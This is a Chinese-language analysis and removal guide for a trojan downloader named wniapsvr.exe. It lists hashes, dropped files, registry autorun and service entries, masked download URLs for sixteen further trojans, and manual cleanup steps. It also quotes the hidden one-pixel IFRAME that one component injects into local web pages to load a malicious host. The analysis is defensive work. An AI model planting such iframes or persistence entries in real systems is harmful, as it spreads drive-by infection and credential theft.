昨天帮助同学杀毒发现了这个新的木马下载者，今天有幸又在某挂马网站里发现了这个病毒，所以写一下分析。
　　File: wniapsvr.exe
　　Size: 24333 bytes
　　File Version: 5.1.2600.2180 (xpsp_sp2_rtm.040803-2158)
　　MD5: E73C5073E03673880C62683BA24DB798
　　SHA1: 7A2496CBBD05F3B01D35C1DDC4A12E93D171DD9A
　　CRC32: 18621B7D

　　病毒运行后：
　　文件变化:
　　释放文件
　　C:\WINDOWS\system32\wniapsvr.exe

　　注册服务Visual VSA WEB

　　服务相关键值
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Type: 0x00000110
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Start: 0x00000002
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ImagePath: "C:\WINDOWS\system32\wniapsvr.exe -Run"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\DisplayName: "Networ VSA"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\ObjectName: "LocalSystem"
HKLM\SYSTEM\CurrentControlSet\Services\Visual VSA WEB\Description: "允许对TCP/IP上NetBios服务以及NetBT名称解析的支持。"

　　删除C:\WINDOWS\system32\verclsid.exe

　　启动IE连接网络 222.88.91.80:80下载木马
　　下载http://web.xxxxxxxxxx.com/web/123.txt到%program files%下面
　　读取里面的木马版本信息
　　下载木马
　　http://web.xxxxxxxxxx.com/soft/1.exe
　　http://web.xxxxxxxxxx.com/soft/2.exe
　　http://web.xxxxxxxxxx.com/soft/3.exe
　　http://web.xxxxxxxxxx.com/soft/4.exe
　　http://web.xxxxxxxxxx.com/soft/5.exe
　　http://web.xxxxxxxxxx.com/soft/6.exe
　　http://web.xxxxxxxxxx.com/soft/7.exe
　　http://web.xxxxxxxxxx.com/soft/8.exe
　　http://web.xxxxxxxxxx.com/soft/9.exe
　　http://web.xxxxxxxxxx.com/soft/a.exe
　　http://web.xxxxxxxxxx.com/soft/b.exe
　　http://web.xxxxxxxxxx.com/soft/c.exe
　　http://web.xxxxxxxxxx.com/soft/d.exe
　　http://web.xxxxxxxxxx.com/soft/e.exe
　　http://web.xxxxxxxxxx.com/soft/f.exe
　　http://web.xxxxxxxxxx.com/soft/g.exe
　　到%program files%下面 分别命名为pro1.exe~pro16.exe

　　木马植入完毕后
　　生成如下文件
　　C:\WINDOWS\system32\AVPSrv.dll
　　C:\WINDOWS\system32\dhapri.dll
　　C:\WINDOWS\system32\Kvsc3.dll
　　C:\WINDOWS\system32\MsIMMs32.dll
　　C:\WINDOWS\system32\netsrvcs.dll
　　C:\WINDOWS\system32\nslookupi.exe
　　C:\WINDOWS\system32\ntsokele.exe
　　C:\WINDOWS\system32\nwizwmgjs.exe
　　C:\WINDOWS\system32\perefic.ini
　　C:\WINDOWS\system32\RemoteDbg.dll
　　C:\WINDOWS\system32\TIMHost.dll
　　C:\WINDOWS\system32\upxdnd.dll
　　C:\WINDOWS\system32\windhcp.ocx
　　C:\WINDOWS\system32\wniapsvr.exe
　　C:\WINDOWS\AVPSrv.exe
　　C:\WINDOWS\Kvsc3.exe
　　C:\WINDOWS\MsIMMs32.exe
　　C:\WINDOWS\TIMHost.exe
　　C:\WINDOWS\upxdnd.exe
　　C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
　　C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
　　C:\WINDOWS\system32\dhapri.dll

　　所有分区下生成hide.exe和autorun.inf E盘下面还生成sysauto.exe
　　sysauto.exe跟C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
C:\Program Files\Internet Explorer\PLUGINS\System64.Sys有关 是盗号木马

　　hide.exe与C:\WINDOWS\system32\RemoteDbg.dll有关

　　值得一提的是C:\WINDOWS\system32\nslookupi.exe这个病毒
　　他感染所有分区的htm html asp 等网页文件
　　在其中加入<IFRAME SRC=http://mm.xxxxxx.com/abc.htm width=1 height=1 frameborder=0></IFRAME>的代码

　　sreng日志中相关项目如下
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
       <upxdnd><C:\WINDOWS\upxdnd.exe>     []
       <Kvsc3><C:\WINDOWS\Kvsc3.exe>     []
       <TIMHost><C:\WINDOWS\TIMHost.exe>     []
       <MsIMMs32><C:\WINDOWS\MsIMMs32.exe>     []
       <AVPSrv><C:\WINDOWS\AVPSrv.exe>     []
       <Microsoft Autorun4><C:\WINDOWS\system32\nwizwmgjs.exe>     []
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows]
       <AppInit_DLLs><dhapri.dll>     []
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks]
       <{12311A42-AC1B-158F-FD32-5674345F23A1}><C:\WINDOWS\system32\dhapri.dll>     []
       <{754FB7D8-B8FE-4810-B363-A788CD060F1F}><C:\Program Files\Internet Explorer\PLUGINS\System64.Sys>     []
　　服务
[Remote Help Session Manager / Rasautol][Stopped/Auto Start]
     <C:\WINDOWS\system32\ntsokele.exe><N/A>
[Networ VSA / Visual VSA WEB][Stopped/Auto Start]
     <C:\WINDOWS\system32\wniapsvr.exe -Run><Microsoft Corporation>
　　进程
[PID: 1748 / Administrator][C:\WINDOWS\Explorer.EXE]     [Microsoft Corporation, 6.00.2900.2180 (xpsp_sp2_rtm.040803-2158)]
       [C:\WINDOWS\system32\dhapri.dll]     [N/A, ]
       [C:\Program Files\Internet Explorer\PLUGINS\System64.Sys]     [N/A, ]
       [C:\WINDOWS\system32\upxdnd.dll]     [N/A, ]
       [C:\WINDOWS\system32\Kvsc3.dll]     [N/A, ]
       [C:\WINDOWS\system32\AVPSrv.dll]     [N/A, ]
       [C:\WINDOWS\system32\MsIMMs32.dll]     [N/A, ]
       [C:\WINDOWS\system32\TIMHost.dll]     [N/A, ]
       [C:\WINDOWS\system32\nwizwmgjs.dll]     [N/A, ]

　　清除方法：
　　首先把C:\WINDOWS\system32\dhapri.dll重命名为其他名称（随便什么）
　　然后重启进入安全模式下
　　打开sreng (该软件可到down.45its.com下载)
　　启动项目     注册表 删除如下项目
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
       <upxdnd><C:\WINDOWS\upxdnd.exe>     []
       <Kvsc3><C:\WINDOWS\Kvsc3.exe>     []
       <TIMHost><C:\WINDOWS\TIMHost.exe>     []
       <MsIMMs32><C:\WINDOWS\MsIMMs32.exe>     []
       <AVPSrv><C:\WINDOWS\AVPSrv.exe>     []
       <Microsoft Autorun4><C:\WINDOWS\system32\nwizwmgjs.exe>     []

　　“启动项目”-“服务”-“Win32服务应用程序”中点“隐藏经认证的微软项目”，
选中以下项目，点“删除服务”，再点“设置”，在弹出的框中点“否”：

[Remote Help Session Manager / Rasautol][Stopped/Auto Start]
     <C:\WINDOWS\system32\ntsokele.exe><N/A>
[Networ VSA / Visual VSA WEB][Stopped/Auto Start]
     <C:\WINDOWS\system32\wniapsvr.exe -Run><Microsoft Corporation>
　　双击我的电脑，工具，文件夹选项，查看，单击选取"显示隐藏文件或文件夹" 并清除"隐藏受保护的操作系统文件（推荐）"前面的钩。在提示确定更改时，单击“是” 然后确定.

　　点击     菜单栏下方的 文件夹按钮（搜索右边的按钮）
　　从左边的资源管理器 进入C盘
　　删除如下文件（如遇提示无法删除文件，到down.45its.com下载费尔木马强制删除器工具进行强制删）
　　C:\hide.exe
　　C:\autorun.inf
　　C:\WINDOWS\system32\AVPSrv.dll
　　C:\WINDOWS\system32\dhapri.dll
　　C:\WINDOWS\system32\Kvsc3.dll
　　C:\WINDOWS\system32\MsIMMs32.dll
　　C:\WINDOWS\system32\netsrvcs.dll
　　C:\WINDOWS\system32\nslookupi.exe
　　C:\WINDOWS\system32\ntsokele.exe
　　C:\WINDOWS\system32\nwizwmgjs.exe
　　C:\WINDOWS\system32\perefic.ini
　　C:\WINDOWS\system32\RemoteDbg.dll
　　C:\WINDOWS\system32\TIMHost.dll
　　C:\WINDOWS\system32\upxdnd.dll
　　C:\WINDOWS\system32\windhcp.ocx
　　C:\WINDOWS\system32\wniapsvr.exe
　　C:\WINDOWS\AVPSrv.exe
　　C:\WINDOWS\Kvsc3.exe
　　C:\WINDOWS\MsIMMs32.exe
　　C:\WINDOWS\TIMHost.exe
　　C:\WINDOWS\upxdnd.exe
　　C:\Program Files\Internet Explorer\PLUGINS\System64.Jmp
　　C:\Program Files\Internet Explorer\PLUGINS\System64.Sys
　　C:\WINDOWS\system32\dhapri.dll(重命名的那个文件)

　　点击     菜单栏下方的 文件夹按钮（搜索右边的按钮）
　　从左边的资源管理器 进入其他分区
　　删除（如遇提示无法删除文件，到down.45its.com下载费尔木马强制删除器工具进行强制删）
　　autorun.inf
　　hide.exe
　　sysauto.exe

　　使用http://www.vaid.cn/blog/attachment/iframekill.rar工具清理被感染的htm等文件